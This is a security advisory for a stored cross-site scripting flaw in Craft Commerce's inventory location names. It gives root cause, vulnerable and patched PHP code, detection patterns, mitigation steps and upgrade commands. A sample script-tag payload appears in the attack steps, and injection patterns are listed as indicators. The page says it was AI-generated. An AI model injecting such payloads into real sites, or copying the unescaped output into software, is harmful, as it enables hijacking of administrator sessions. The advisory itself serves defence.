CVE-2026-29176 Overview
CVE-2026-29176 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce, an ecommerce platform for Craft CMS. Prior to version 5.5.3, the Commerce Settings - Inventory Locations page renders the Name field without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript code. This XSS triggers when an administrator or user with product editing permissions creates or edits a variant product.
Critical Impact
Attackers with high privileges can inject persistent malicious scripts that execute in the context of other administrators' browsers, potentially leading to session hijacking, credential theft, or unauthorized administrative actions within the ecommerce platform.
Affected Products
- Craft Commerce versions prior to 5.5.3
- Craft CMS installations with Commerce plugin enabled
- craftcms craft_commerce (cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*)
Discovery Timeline
- 2026-03-10 - CVE-2026-29176 published to NVD
- 2026-03-11 - Last updated in NVD database
Technical Details for CVE-2026-29176
Vulnerability Analysis
This stored XSS vulnerability exists due to improper output encoding in the PurchasableStockField.php component. When inventory location names are rendered in the administrative interface, the application directly outputs the location name without HTML encoding. This allows malicious JavaScript embedded in inventory location names to persist in the database and execute whenever an administrator views or interacts with variant products that reference those locations.
The vulnerability requires high privileges to exploit (administrative access to create inventory locations), but impacts other privileged users who subsequently view affected pages. The attack surface is limited to the administrative backend, making this a secondary-level threat within the context of authenticated administrative sessions.
Root Cause
The root cause is a missing call to Html::encode() when rendering inventory location names in the stock field template. The vulnerable code directly outputs the result of $inventoryLevel->getInventoryLocation()->name without sanitization, allowing raw HTML and JavaScript to be interpreted by the browser.
Attack Vector
This is a network-based attack requiring authenticated access with administrative privileges. An attacker with inventory location management permissions can:
- Navigate to Commerce Settings - Inventory Locations
- Create or modify an inventory location with a malicious name containing JavaScript (e.g., <script>alert('XSS')</script>)
- The payload persists in the database
- When any administrator creates or edits a variant product, the malicious script executes in their browser context
The patch addresses this by properly encoding the location label before rendering:
// Vulnerable code (before patch)
$inventoryLevelTableRows .= Html::beginTag('tr') .
Html::beginTag('td') .
$inventoryLevel->getInventoryLocation()->name .
Html::endTag('td') .
// Fixed code (after patch)
$inventoryLevelTableRows .= Html::beginTag('tr') .
Html::beginTag('td') .
Html::encode($inventoryLevel->getInventoryLocation()->getUiLabel()) .
Html::endTag('td') .
Source: GitHub Commit da143df
Detection Methods for CVE-2026-29176
Indicators of Compromise
- Unusual HTML tags or JavaScript code present in inventory location names in the database
- Inventory location entries containing <script>, onerror=, onclick=, or other event handler patterns
- Administrator reports of unexpected browser behavior when editing variant products
- Session tokens or credentials being sent to external domains
Detection Strategies
- Review the craft_commerce_inventorylocations table for entries containing suspicious HTML or JavaScript patterns
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Monitor browser console logs in administrative sessions for script injection warnings
- Audit administrative user activity logs for unusual inventory location creation or modification patterns
Monitoring Recommendations
- Enable web application firewall (WAF) rules to detect stored XSS payloads in form submissions
- Configure alerting for inventory location modifications containing special characters or HTML entities
- Deploy browser-based XSS detection tools that can identify script injection attempts in real-time
- Regularly audit administrative interface components for proper output encoding
How to Mitigate CVE-2026-29176
Immediate Actions Required
- Upgrade Craft Commerce to version 5.5.3 or later immediately
- Audit existing inventory location names for malicious content and sanitize any suspicious entries
- Review administrative user access and remove unnecessary privileges for inventory location management
- Implement Content Security Policy headers to provide defense-in-depth against XSS attacks
Patch Information
Craft Commerce version 5.5.3 addresses this vulnerability by properly encoding inventory location names before rendering them in the administrative interface. The fix replaces direct output of the name property with an encoded call to getUiLabel() wrapped in Html::encode().
Update your Craft Commerce installation via Composer:
Workarounds
- Restrict access to the Commerce Settings - Inventory Locations page to only essential personnel until patching is complete
- Implement strict Content Security Policy headers that block inline script execution (script-src 'self')
- Manually review and sanitize all existing inventory location names in the database
- Consider temporarily disabling the inventory locations feature if not critical to operations
# Update Craft Commerce via Composer
composer require craftcms/commerce:^5.5.3
php craft migrate/all
php craft project-config/apply
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
